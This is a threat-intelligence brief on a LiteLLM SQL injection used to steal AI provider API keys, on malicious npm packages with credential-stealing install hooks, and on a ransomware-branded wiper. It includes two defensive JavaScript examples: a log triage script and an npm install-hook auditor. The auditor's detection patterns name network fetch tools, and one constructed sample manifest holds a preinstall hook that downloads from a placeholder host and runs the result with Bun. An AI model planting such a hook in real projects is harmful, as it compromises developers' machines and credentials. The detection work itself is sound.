Monday’s brief documented four AI inference servers exploited within 10-20 hours of disclosure and framed it as a new operational baseline. Forty-eight hours later, the same exploitation clock started on a different component: CVE-2026-42208, a pre-authentication SQL injection in BerriAI’s LiteLLM proxy, was weaponized within 36 hours of its GitHub advisory going public on April 25. Sysdig honeypots confirmed active attacks sending crafted Authorization headers to extract rows from the litellm_credentials and litellm_config tables.

What is being stolen here is different from the inference server campaigns. Attackers are not after user data or lateral movement tokens. They are after LLM provider API keys, the credentials that authorize inference spend against OpenAI, Anthropic, Google, and others. LiteLLM is typically deployed precisely because an organization wants a single authentication and routing layer in front of multiple AI providers. That architectural choice centralizes access control in a way that makes a single credential dump extraordinarily valuable: one SQL injection yields keys for every AI platform the proxy serves. The attack surface is not just widening; it is moving up the stack to wherever centralized AI access is managed.

The CVSS score is 9.3, and the 36-hour exploitation window places it alongside the AI inference server cluster from Monday. Organizations running LiteLLM as a self-hosted proxy should treat this as actively exploited until patched. The affected component is the authentication path, which means unauthenticated requests are sufficient to trigger the injection; there is no authentication layer to hide behind while patching is staged.
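For triage while patching is staged, the following added example (not part of the original brief and not LiteLLM or Sysdig code) flags Authorization header values that fall outside the RFC 6750 bearer-token alphabet and escalates any that name the two tables mentioned above. It assumes a fronting proxy writes JSON-lines logs with hypothetical `src` and `authorization` fields; the sample log is constructed and its header values are stand-ins, not captured payloads.

```javascript
// RFC 6750 bearer credential: "Bearer " + b64token. Quotes, spaces,
// parentheses and semicolons are all outside this alphabet.
const BEARER = /^Bearer [A-Za-z0-9\-._~+\/]+=*$/;
// Table names the brief reports attackers reading from.
const TABLES = ["litellm_credentials", "litellm_config"];

// Classify one Authorization header value.
function classifyAuthHeader(value) {
  if (value === undefined || value === null || value === "") return "missing";
  if (BEARER.test(value)) return "ok";
  const lower = String(value).toLowerCase();
  return TABLES.some((t) => lower.includes(t)) ? "table-probe" : "malformed";
}

// Triage JSON-lines proxy logs (assumed fields: src, authorization).
function triage(logText) {
  const bySource = new Map();
  for (const line of logText.split("\n")) {
    if (!line.trim()) continue;
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip unparsable lines
    const verdict = classifyAuthHeader(rec.authorization);
    if (verdict === "ok" || verdict === "missing") continue;
    const entry = bySource.get(rec.src) || { src: rec.src, hits: 0, worst: "malformed" };
    entry.hits += 1;
    if (verdict === "table-probe") entry.worst = "table-probe";
    bySource.set(rec.src, entry);
  }
  // Sources that named the credential tables sort first, then by volume.
  const isProbe = (e) => Number(e.worst === "table-probe");
  return [...bySource.values()].sort((a, b) => isProbe(b) - isProbe(a) || b.hits - a.hits);
}

// Constructed sample log: documentation IP ranges, stand-in header values.
const SAMPLE_LOG = [
  { src: "198.51.100.7", authorization: "Bearer sk-constructedKey123" },
  { src: "203.0.113.9", authorization: "Bearer x' [constructed SQL fragment]" },
  { src: "203.0.113.9", authorization: "Bearer y') [constructed SQL fragment]" },
  { src: "192.0.2.44", authorization: "Bearer z' [constructed fragment naming litellm_credentials]" },
  { src: "198.51.100.7" },
].map((r) => JSON.stringify(r)).join("\n");
console.log(triage(SAMPLE_LOG));
```

A source flagged here is a lead for credential rotation and log review, not proof of a successful dump; many proxies do not log the Authorization header by default, and logging it has its own exposure cost.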

This matters beyond the immediate CVE. The Monday assessment tracked HuggingFace-hosted payloads as a delivery mechanism and noted that the AI exploitation window had “collapsed” for inference servers. LiteLLM’s compromise shows the same attacker logic extending to the proxy and gateway layer, a shift I unpacked at length in “Invisible by Default: AI Middleware Is the New Soft Target.” The inference server is where models run; the proxy is where access is controlled. Compromising the proxy is, in some respects, more efficient: a single successful attack yields credentials for every AI backend the organization uses, without requiring separate exploitation of each inference platform. If this pattern holds, model registries, fine-tuning pipelines, and API management layers are the next logical targets in the same progression.

One more item reinforces this week’s supply chain pressure on AI development tooling. On April 29, between 09:55 and 12:14 UTC, attackers published malicious versions of SAP-related npm packages containing a preinstall hook that downloads and executes a Bun-runtime credential stealer. The targets are familiar: GitHub and npm tokens, GitHub Actions secrets, AWS, Azure, GCP, and Kubernetes credentials. This is distinct from the Bitwarden CLI operation covered Monday; two independent npm supply chain operations were active in the same week, converging on the same category of developer credentials. The developer toolchain is not experiencing isolated incidents. It is experiencing sustained, concurrent pressure from multiple threat actor clusters, and it fits the trust inversion pattern I documented earlier this month: defenders’ own tooling is the highest-value target precisely because it is trusted by default.
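To check an existing install for the hook mechanism described above, this added example (not from the original brief) audits package manifests for install-time lifecycle scripts and tags commands that fetch from the network or invoke Bun. The risk patterns are heuristic assumptions, the `auditTree` walker and all names are hypothetical, and the sample manifests are constructed.

```javascript
// Lifecycle hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Heuristics (assumptions) for a hook that fetches or launches a second stage.
const RISK_PATTERNS = [
  { tag: "network-fetch", re: /\b(curl|wget|https?:\/\/)/i },
  { tag: "bun-runtime", re: /\bbun\b/i },
  { tag: "inline-eval", re: /\bnode\s+(-e|--eval)\b/i },
];

// Return one finding per install-time hook declared in a parsed package.json.
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === "string").map((hook) => ({
    name: manifest.name, version: manifest.version, hook,
    command: scripts[hook],
    tags: RISK_PATTERNS.filter((p) => p.re.test(scripts[hook])).map((p) => p.tag),
  }));
}

// Walk a node_modules tree and audit every package.json found.
async function auditTree(root) {
  const fs = await import("node:fs/promises");
  const path = await import("node:path");
  const findings = [];
  async function walk(dir) {
    for (const ent of await fs.readdir(dir, { withFileTypes: true })) {
      const full = path.join(dir, ent.name);
      if (ent.isDirectory()) await walk(full);
      else if (ent.name === "package.json") {
        try { findings.push(...auditManifest(JSON.parse(await fs.readFile(full, "utf8")))); }
        catch { /* unreadable or invalid JSON: skip */ }
      }
    }
  }
  await walk(root);
  return findings;
}

// Constructed sample manifests (package names and URL are placeholders).
const SAMPLE_MANIFESTS = [
  { name: "constructed-benign", version: "1.0.0", scripts: { test: "node test.js" } },
  { name: "constructed-native", version: "2.1.0", scripts: { install: "node-gyp rebuild" } },
  { name: "constructed-dropper", version: "9.9.9",
    scripts: { preinstall: "curl -sO https://example.invalid/runtime.tgz && bun run setup.js" } },
];
console.log(SAMPLE_MANIFESTS.flatMap((m) => auditManifest(m)));
```

Untagged findings such as native-build hooks still run code at install time and need review; installing with npm's `--ignore-scripts` option prevents lifecycle hooks from running at all.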


Escalations from Monday

The most significant change since Monday’s brief concerns TeamPCP. Monday’s report detailed their third confirmed supply chain operation in three weeks and noted the campaign’s increasing tempo. Since then, the threat has materially escalated in a way that changes the blast radius calculation entirely.

On April 28, TeamPCP announced a partnership with ransomware-as-a-service operator VECT on BreachForums, advertising combined supply-chain-to-ransomware capabilities. Check Point Research subsequently confirmed that VECT’s decryptor is non-functional: any file at or above 128 KB is permanently destroyed, not encrypted. VECT is a wiper wearing ransomware branding.

The implications for any organization in TeamPCP’s targeting scope are direct. The supply chain operations Monday described, including the Bitwarden CLI compromise via Checkmarx CI, were credential theft campaigns. Organizations that detected and contained them faced credential rotation and audit work. If the same access pattern is handed to VECT as the payload delivery mechanism, the outcome is not a ransom negotiation. It is unrecoverable data destruction. Victims who paid VECT received nothing. The only viable recovery path is offline, air-gapped backups that predate the infection.

This is not a new ransomware gang adding a decryptor bug to their list of problems. The wiper behavior is systematic and confirmed. TeamPCP’s supply chain operations create initial access; VECT converts that access into destruction with no reversibility. Any developer toolchain compromise attributed to TeamPCP in the coming weeks should be treated as a potential wiper precursor, not a contained credential incident.


What to Watch

Two items warrant close attention before next Monday. First, CVE-2026-32202, the Windows Shell authentication coercion flaw that Microsoft partially addressed in February, was confirmed exploited and added to CISA’s KEV catalog on April 29 with a May 12 federal remediation deadline. The flaw enables NTLM hash capture and pass-the-hash lateral movement with no user interaction required. Incomplete patches that leave the original attack surface open are a reliable exploitation target; watch for ransomware groups integrating this into their initial access toolkit before the patch deadline passes. Second, CISA’s Stakeholder Engagement Division has been cut from 189 to 93 personnel as of April 29, with outreach programs described as effectively frozen. The KEV catalog is growing, federal patching deadlines are accelerating, and the coordination capacity that bridges those deadlines to sector-specific implementation is shrinking. The operational gap created by those cuts will not manifest in a single incident; it will appear gradually as advisory follow-through weakens across critical infrastructure sectors.


Security Unlocked publishes threat intelligence and strategic analysis twice weekly. This mid-week brief covers developments from 2026-04-27 through 2026-04-30.